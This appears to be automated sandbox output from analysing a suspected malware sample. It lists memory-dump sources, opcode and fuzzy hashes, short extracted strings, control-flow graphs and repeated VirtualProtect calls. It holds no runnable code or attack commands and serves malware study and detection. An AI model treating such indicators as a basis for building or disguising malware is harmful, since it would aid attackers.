                • Opcode ID: 1ac1d6199046fae454b6d6b7d0992c4393a3ac780ad6a70ce253914036ef9b2c
                • Instruction ID: d15880e34785be5329c74ae33ebd6cfaa4aa8d1fe3bfa78b48a063308da873fc
                • Opcode Fuzzy Hash: 1ac1d6199046fae454b6d6b7d0992c4393a3ac780ad6a70ce253914036ef9b2c
                • Instruction Fuzzy Hash: ACA25974A04229CFDB64DF54E998B9DBBB2FB99700F2081D9D41AAB354DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: "F$1kKR$1kKR$1kKR$:L|$L:*S$L:*S$L:*S$T}A$cEVT$k8w[$qrA&$sVYZ$Q<
                • API String ID: 0-1202736677
                • Opcode ID: 3fda1a9d79c3e2c998f1f015fa819d0855b11b1386da2607e2af43fe37e0b743
                • Instruction ID: b2a2ff6446788f17597525d023080ed42248638293a1e99fb0649e379736de94
                • Opcode Fuzzy Hash: 3fda1a9d79c3e2c998f1f015fa819d0855b11b1386da2607e2af43fe37e0b743
                • Instruction Fuzzy Hash: C1927A74A04229CFDB64DF18E998B9DB7B2FB98300F208199D41AEB354DB309E81CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 610 1535af1-1535b21 611 1535b23-1535b45 610->611 612 1535b47-1535c33 call 15356d0 * 2 610->612 611->612 625 1535c3e-1535d2b call 1535160 call 15356d0 612->625 638 1535d37 625->638 639 1535d3c-1535d51 638->639 640 1535d53 639->640 641 1535db9-1535e3c 639->641 640->638 640->641 642 1535e71-1535e9c call 1535160 640->642 643 1536097 640->643 644 1535d5a-1535d8b call 1534d20 640->644 645 1535e9e 640->645 646 1535fdd 640->646 647 153603d 640->647 648 153609c-1536150 call 1534d20 640->648 649 1535f02 640->649 650 1535f86-1535fd1 call 1535160 640->650 651 1535f25-1535f57 640->651 652 1535e44 640->652 653 1536004-1536035 call 1534d20 640->653 654 153606a-1536095 call 1535160 640->654 669 1535ea3-1535ef6 call 1535160 call 15356d0 641->669 655 1535e4e-1535e68 642->655 643->648 644->639 645->669 657 1535fe2-1535ff7 646->657 659 1536047-1536061 647->659 678 1536158 648->678 694 15361b7-153629c call 1535160 648->694 663 1535f07-1535f1c 649->663 650->646 651->663 652->655 653->647 653->657 654->659 655->645 665 1535e6a 655->665 657->648 667 1535ffd 657->667 659->643 670 1536063 659->670 663->650 674 1535f1e 663->674 665->642 665->643 665->645 665->646 665->647 665->648 665->649 665->650 665->651 665->652 665->653 665->654 677 15361b2 665->677 665->678 679 1536185-15361b0 call 15356d0 665->679 667->643 667->646 667->647 667->648 667->653 667->654 667->677 667->678 667->679 669->649 670->643 670->647 670->654 670->677 670->678 670->679 674->643 674->646 674->647 674->648 674->649 674->650 674->651 674->653 674->654 674->677 674->678 674->679 677->694 683 1536162-153617c 678->683 679->683 683->677 692 153617e 683->692 692->677 692->678 692->679
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: #RH$$#&b$5cgu$5cgu$hE
                • API String ID: 0-1348839357
                • Opcode ID: 22a9cf8a843294d3732afff18f92ff8fd56a51b595b2cde6ba0e15c2820f7123
                • Instruction ID: 4cba9c5ec3f2e6e26efde507262c3899a52bdd0183667e229e452112174acd0a
                • Opcode Fuzzy Hash: 22a9cf8a843294d3732afff18f92ff8fd56a51b595b2cde6ba0e15c2820f7123
                • Instruction Fuzzy Hash: 8FF18E78B002158FCB59DF68D81825EBBB3BBC9211F2584A9D40EEB759DF348D468F81
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 729 1535bfb-1535c33 call 15356d0 734 1535c3e-1535d2b call 1535160 call 15356d0 729->734 747 1535d37 734->747 748 1535d3c-1535d51 747->748 749 1535d53 748->749 750 1535db9-1535e3c 748->750 749->747 749->750 751 1535e71-1535e9c call 1535160 749->751 752 1536097 749->752 753 1535d5a-1535d8b call 1534d20 749->753 754 1535e9e 749->754 755 1535fdd 749->755 756 153603d 749->756 757 153609c-1536150 call 1534d20 749->757 758 1535f02 749->758 759 1535f86-1535fd1 call 1535160 749->759 760 1535f25-1535f57 749->760 761 1535e44 749->761 762 1536004-1536035 call 1534d20 749->762 763 153606a-1536095 call 1535160 749->763 778 1535ea3-1535ef6 call 1535160 call 15356d0 750->778 764 1535e4e-1535e68 751->764 752->757 753->748 754->778 766 1535fe2-1535ff7 755->766 768 1536047-1536061 756->768 787 1536158 757->787 803 15361b7-153629c call 1535160 757->803 772 1535f07-1535f1c 758->772 759->755 760->772 761->764 762->756 762->766 763->768 764->754 774 1535e6a 764->774 766->757 776 1535ffd 766->776 768->752 779 1536063 768->779 772->759 783 1535f1e 772->783 774->751 774->752 774->754 774->755 774->756 774->757 774->758 774->759 774->760 774->761 774->762 774->763 786 15361b2 774->786 774->787 788 1536185-15361b0 call 15356d0 774->788 776->752 776->755 776->756 776->757 776->762 776->763 776->786 776->787 776->788 778->758 779->752 779->756 779->763 779->786 779->787 779->788 783->752 783->755 783->756 783->757 783->758 783->759 783->760 783->762 783->763 783->786 783->787 783->788 786->803 792 1536162-153617c 787->792 788->792 792->786 801 153617e 792->801 801->786 801->787 801->788
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: #RH$$#&b$5cgu$5cgu$hE
                • API String ID: 0-1348839357
                • Opcode ID: 88ab688af22c3216d4c9c4070f0691dee4377cb0682337b02352956138cb8c26
                • Instruction ID: 26285213ebd06958a3854967b46a1c98933fe9334651e9963e61b3cbba840d8a
                • Opcode Fuzzy Hash: 88ab688af22c3216d4c9c4070f0691dee4377cb0682337b02352956138cb8c26
                • Instruction Fuzzy Hash: FED14D78B001158FDB58DF68E81825EBBB3BBC9211F258469D80EEB758DF349D468F81
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: jop5
                • API String ID: 0-1339619763
                • Opcode ID: 9a555290ad3d9479d09af643de948b8e6c5b29e7c61d9f10bad47f835e63f4f5
                • Instruction ID: 74da47c00f813d90bd53d787007558388211fd695808bdf956e57515e131365a
                • Opcode Fuzzy Hash: 9a555290ad3d9479d09af643de948b8e6c5b29e7c61d9f10bad47f835e63f4f5
                • Instruction Fuzzy Hash: 2471F335B04605AFDF14CBA8E8546AF77F6ABC8710F25442AE806EB750DB74DD02CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: P3e
                • API String ID: 0-2387664673
                • Opcode ID: c2058ff20391ee76f2823cd68a8eef49f5a389fc1bc8df2eb325d13789642868
                • Instruction ID: 568242660899a8ec66f38fc6d973ab11d2289c02e048c84dd822898110dc5040
                • Opcode Fuzzy Hash: c2058ff20391ee76f2823cd68a8eef49f5a389fc1bc8df2eb325d13789642868
                • Instruction Fuzzy Hash: 9A51F034B042058FDB54ABB8A4296AE76FBFB89304F35856AD416EB350DF71CC028B90
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: jop5
                • API String ID: 0-1339619763
                • Opcode ID: c6ed4f17c8745094ed947e69a5b9a52a2539869cecdee068207776c9d5312a97
                • Instruction ID: b1d02460b3376ef65402f803e9ec1e3634b40461fb6cfd57951e603150cdb2a5
                • Opcode Fuzzy Hash: c6ed4f17c8745094ed947e69a5b9a52a2539869cecdee068207776c9d5312a97
                • Instruction Fuzzy Hash: A4513238B04605EBDF149A68E81467F76EBABC8710F24442AE807EB754DF30DE02CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: J:Q
                • API String ID: 0-553654187
                • Opcode ID: e412adcb8b796585c08ecc1032057f68cf47ee44cc8287105114c2a8a2c52e2e
                • Instruction ID: d6583c13ad0c0955491633de12652b430c3209d4683874ebf884dc2eb48205a5
                • Opcode Fuzzy Hash: e412adcb8b796585c08ecc1032057f68cf47ee44cc8287105114c2a8a2c52e2e
                • Instruction Fuzzy Hash: 8151E336E001158FD7149BAEC945A6FF7E7FBC4600F12852AD90AEF3A4CA349D498BD1
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID: 3z_
                • API String ID: 0-3296393077
                • Opcode ID: 8e732ad78113031940229e8adb525ccca06a1e94f256b82687de8a5754e09cd5
                • Instruction ID: 5cd7dfed4789ca583a924db87d5ac0be75296f06c5dcc2575a8438650673f204
                • Opcode Fuzzy Hash: 8e732ad78113031940229e8adb525ccca06a1e94f256b82687de8a5754e09cd5
                • Instruction Fuzzy Hash: 7E41AB30A14704CFCB24CF78C88489EBBF5BB8A300B01896AD456EF252DB38D845CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c590e4350c531c81006472a899d6d29f151386b1fcaf741efffd670288af0806
                • Instruction ID: 7360ccdb8bd720ec6ded33c226955c6b3b6a8254f2e3215352007bc8f7f95118
                • Opcode Fuzzy Hash: c590e4350c531c81006472a899d6d29f151386b1fcaf741efffd670288af0806
                • Instruction Fuzzy Hash: 6F91B735F24219CBDB44CFA9D9905AEBBFAAFC8704F248826D415EB684DB30DD05CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5d140b64285a3c5ef9fdfcc9d77c20b6b94e49623b224c88b36a2f7d3b76484e
                • Instruction ID: 50381ef5be6b3e174dce9429ce073f11a15689388a0b6f02eec3a6e2fb9b0be0
                • Opcode Fuzzy Hash: 5d140b64285a3c5ef9fdfcc9d77c20b6b94e49623b224c88b36a2f7d3b76484e
                • Instruction Fuzzy Hash: 6D91A475F24219CBDB44CFA9D9905AEBBFAAFC8600F248926D415EB784DB30DD058B81
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6a888685c1f7703326dd8bebd7ea4d738367b07abbb65cb40e9a9508ff1f1da
                • Instruction ID: 10ef2e2f8441b87108e2ac7552fe4c7f9d0f68ff6eab1ab4a42b409c8a231895
                • Opcode Fuzzy Hash: d6a888685c1f7703326dd8bebd7ea4d738367b07abbb65cb40e9a9508ff1f1da
                • Instruction Fuzzy Hash: 0F714372A002148FC7548F79C885AAABBF7FFC1610F05856ADC05AF365CA399D09CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 125ce46ee30852a7acd0d4e32e1123881041ce02a09c6fb90d97f4ae8b664045
                • Instruction ID: 50a575e5617f37261cb940ee0ae6250189531be72fd1f6001f0968da2880f762
                • Opcode Fuzzy Hash: 125ce46ee30852a7acd0d4e32e1123881041ce02a09c6fb90d97f4ae8b664045
                • Instruction Fuzzy Hash: 7B710475605205CFC78ACF24C98486ABBF6FFC5304B0689A2D856DF266C338ED46CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a502e9397796b2392f7d5d11c4c1806c76f90b4fd3273546be05a1a8ee1d464
                • Instruction ID: 9888cec7beac0cd5e1f0c798a0b7b77e7cd725f9e5f5b1b56c89b97176863b53
                • Opcode Fuzzy Hash: 5a502e9397796b2392f7d5d11c4c1806c76f90b4fd3273546be05a1a8ee1d464
                • Instruction Fuzzy Hash: 0861F131A047448FC745CFA998904AAFBFABBC9320F55886BE506DF6A1C338DE518B51
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b906457cbf6130812f54758c201cabbf460e0fed3c1e42e546e226e930b832bd
                • Instruction ID: 162db3058d42bc5b4f79d948e38b4854607dcd97df9586c505b90dfa0d852159
                • Opcode Fuzzy Hash: b906457cbf6130812f54758c201cabbf460e0fed3c1e42e546e226e930b832bd
                • Instruction Fuzzy Hash: 2C61D079605205CFC78ACF28C58842ABBE6FFC4308B524992D956DF3A6C734ED85CB85
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.438871522.000000000B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B390000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b390000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 60689074917b91607d3892744f2af02fec578c1aa960eded1ee0323b00f815b5
                • Instruction ID: ee84d793a19219088bd200139e46f014b895eb1f42456d96c7205a8f118115f8
                • Opcode Fuzzy Hash: 60689074917b91607d3892744f2af02fec578c1aa960eded1ee0323b00f815b5
                • Instruction Fuzzy Hash: 4741A535F24109DBDF54CBA8E945AAFB7BAAB88644F248826E416EB6C0DB30DD05C750
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 838 1530e54-1530ef4 839 1530ef6-1530f2a 838->839 840 1530f3f-1530f49 838->840 851 1530f30-1530f3d 839->851 841 1531731-15318b8 VirtualProtect 840->841 842 1530f4f-1530f5d 840->842 857 15318c1-15318e2 841->857 858 15318ba-15318c0 841->858 844 1530f67-1530f7f 842->844 852 1530f84-1530f99 844->852 851->840 854 1530f5f-1530f64 851->854 855 1531729-1531730 852->855 856 1530f9f-1530fdd 852->856 854->844 855->841 856->852 858->857
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4038608630e6e0d06340fda0ff372c71876f6b31e5579c22cc5efd27a74e2a89
                • Instruction ID: 80f5f477b904a35ab7328e167854307cd47a3f9c86afa1a401cd5edb6e671bb5
                • Opcode Fuzzy Hash: 4038608630e6e0d06340fda0ff372c71876f6b31e5579c22cc5efd27a74e2a89
                • Instruction Fuzzy Hash: 3EB18D709443449FCB51CF64D8C49DABBB9FF85324B18C0AAEC449B212D379A94ADBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 861 15310b9-15310bb 862 1531731-15318b8 VirtualProtect 861->862 863 15310c1-15310c8 861->863 873 15318c1-15318e2 862->873 874 15318ba-15318c0 862->874 863->862 864 15310ce-15310d8 863->864 864->862 866 15310de-15310e5 864->866 866->862 868 15310eb-15310f6 866->868 868->862 870 15310fc-1531103 868->870 870->862 871 1531109-1531115 870->871 871->862 874->873
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 1f5cf30ebe838477e898916be656583bb125ecaa64efa8969d8530eaf0ba2c0d
                • Instruction ID: 38f64ea27a4b138d6d7230b6b4f7490c59a2733b82acdb012cbe0c1e0dd9cb78
                • Opcode Fuzzy Hash: 1f5cf30ebe838477e898916be656583bb125ecaa64efa8969d8530eaf0ba2c0d
                • Instruction Fuzzy Hash: 49619C708443019FCB90CF64D9C59DABBB9FF84324B58C06AEC549B606D339A94ADFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 906 153105d-153105f 907 1531731-15318b8 VirtualProtect 906->907 908 1531065-153106c 906->908 918 15318c1-15318e2 907->918 919 15318ba-15318c0 907->919 908->907 909 1531072-1531083 908->909 909->907 911 1530f84-1530f99 909->911 913 1531729-1531730 911->913 914 1530f9f-1530fdd 911->914 913->907 914->911 919->918
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: e43a5cf4053c01ef35deb6b47fb6a088045c837aed71031cad4fe455a24a7219
                • Instruction ID: 91c115d8a3871ba7209687066dff29865ca1aabd0ed34faa954604b4ef1cc63d
                • Opcode Fuzzy Hash: e43a5cf4053c01ef35deb6b47fb6a088045c837aed71031cad4fe455a24a7219
                • Instruction Fuzzy Hash: 66619E709443459FCB54CFA4DCC5ADABBB9FB85334B08C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 891 1531030-1531032 892 1531731-15318b8 VirtualProtect 891->892 893 1531038-153103f 891->893 903 15318c1-15318e2 892->903 904 15318ba-15318c0 892->904 893->892 894 1531045-1531056 893->894 894->892 896 1530f84-1530f99 894->896 898 1531729-1531730 896->898 899 1530f9f-1530fdd 896->899 898->892 899->896 904->903
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 7842dd2b0f617e69aeb0390621a1b52a8d4fb7483c17549cfe151a90728058a2
                • Instruction ID: fe1ea4a8aed3e903d916e3a3d77024df45a3abf5ebc6d6d3954e1deb8a84b613
                • Opcode Fuzzy Hash: 7842dd2b0f617e69aeb0390621a1b52a8d4fb7483c17549cfe151a90728058a2
                • Instruction Fuzzy Hash: 4561A1709443459FC754CF64D8C19DABBB9FF85334B48C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 876 1530fe1-1530fe3 877 1531731-15318b8 VirtualProtect 876->877 878 1530fe9-1530ff0 876->878 888 15318c1-15318e2 877->888 889 15318ba-15318c0 877->889 878->877 879 1530ff6-1531008 878->879 881 1530f84-1530f99 879->881 883 1531729-1531730 881->883 884 1530f9f-1530fdd 881->884 883->877 884->881 889->888
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: bc22e495d7de63b22561fbdf628695e3911088a0155873fb774b9990b2055ba0
                • Instruction ID: 7848b3ed2ebb3b088c0bd67aa4668e37da08e10b38c8a23f9f3f8b3bb5800d21
                • Opcode Fuzzy Hash: bc22e495d7de63b22561fbdf628695e3911088a0155873fb774b9990b2055ba0
                • Instruction Fuzzy Hash: 3B619E709443459FCB54CFA4D8C19DABBB9FF85334B08C06AEC449A206D339A94ADBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 921 1531143-153116c 922 1531172-1531179 921->922 923 1531731-15318b8 VirtualProtect 921->923 922->923 924 153117f-153118b 922->924 929 15318c1-15318e2 923->929 930 15318ba-15318c0 923->930 924->923 930->929
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: ac304e062d3a6df0fb487bb383d9436bf10ca05490709be414360ae46471f401
                • Instruction ID: 1c7bb49a0047857b1605d98745064bf526361739a682149d2b1721f1d36e373e
                • Opcode Fuzzy Hash: ac304e062d3a6df0fb487bb383d9436bf10ca05490709be414360ae46471f401
                • Instruction Fuzzy Hash: AB619DB08443459FCB54CF64DDC1ADABBB9FB85334B18C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 932 153160b-153161b 933 1531731-15318b8 VirtualProtect 932->933 934 1531621-1531643 932->934 939 15318c1-15318e2 933->939 940 15318ba-15318c0 933->940 934->933 940->939
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e0f7ed4aa0bd8076f1c327980c1d309c157af9f636758f73936c68f1862c7e0
                • Instruction ID: d6856ca923c946db45bbf80b1416719da492abe56801d867fc64abf305d00194
                • Opcode Fuzzy Hash: 7e0f7ed4aa0bd8076f1c327980c1d309c157af9f636758f73936c68f1862c7e0
                • Instruction Fuzzy Hash: 98617D709443459FCB54CFA4DCC59DABBB9FF84334B18C06AEC449A206D339A94ADFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 942 15315d6-15315d8 943 1531731-15318b8 VirtualProtect 942->943 944 15315de-15315e5 942->944 951 15318c1-15318e2 943->951 952 15318ba-15318c0 943->952 944->943 945 15315eb-15315f2 944->945 945->943 947 15315f8-1531601 945->947 947->943 952->951
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 1fa558b50ba94f1c6c69a4efad0d72254afe9aaf4c22431bbd1addb7111964a9
                • Instruction ID: 0528e4cd41dfdcb8bcb68af28fbe039820ea84cc01199545d35f9996c3d0c403
                • Opcode Fuzzy Hash: 1fa558b50ba94f1c6c69a4efad0d72254afe9aaf4c22431bbd1addb7111964a9
                • Instruction Fuzzy Hash: A7519EB08443459FC754CF64D8C59DABBB9FB84334B48C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 954 15311d1-15311d3 955 1531731-15318b8 VirtualProtect 954->955 956 15311d9-15311e0 954->956 962 15318c1-15318e2 955->962 963 15318ba-15318c0 955->963 956->955 957 15311e6-15311f2 956->957 957->955 963->962
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f427f9466de103e14029068f74c0ad051ea075db31920897d21b53b095875036
                • Instruction ID: 7876fda6fbe8ab29adfe4593d40a27021fb635594468d99399d01e26100e4eb7
                • Opcode Fuzzy Hash: f427f9466de103e14029068f74c0ad051ea075db31920897d21b53b095875036
                • Instruction Fuzzy Hash: F3517F708443459FC794CFA4D8C59DABBB9FF85334B18C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 965 15311fe-1531200 966 1531731-15318b8 VirtualProtect 965->966 967 1531206-153120d 965->967 973 15318c1-15318e2 966->973 974 15318ba-15318c0 966->974 967->966 968 1531213-153121f 967->968 968->966 974->973
                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: ad359d41c2db48d51b3f91aafd849fd5ab11d81b76e7dd9b08c0c8dcdbef9668
                • Instruction ID: 87c8937b7c3210226b63b2842a32ee926ee4b1a1c142bb1aa726404395299458
                • Opcode Fuzzy Hash: ad359d41c2db48d51b3f91aafd849fd5ab11d81b76e7dd9b08c0c8dcdbef9668
                • Instruction Fuzzy Hash: 17517D708443459FCB94CFA4DCC59DABBB9FB85334B18C06AEC445A206D339A94ADFB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015318AB
                Memory Dump Source
                • Source File: 00000000.00000002.433886667.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1530000_dBvNa2pTbj.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 89d6d6bafb9f43aad2a9eb98dc922053697f70e2a0f177fa25f0235ef8bf91f9
                • Instruction ID: d1c75b11475cdbd27287bdc4b44af37026525ff1b20a22d9a6f0deeb18ff9a89
                • Opcode Fuzzy Hash: 89d6d6bafb9f43aad2a9eb98dc922053697f70e2a0f177fa25f0235ef8bf91f9
                • Instruction Fuzzy Hash: 3251AF708443459FCB50CFA4D8C5ADABBB9FF84334B08C06AEC445A206D339A94ADFB1
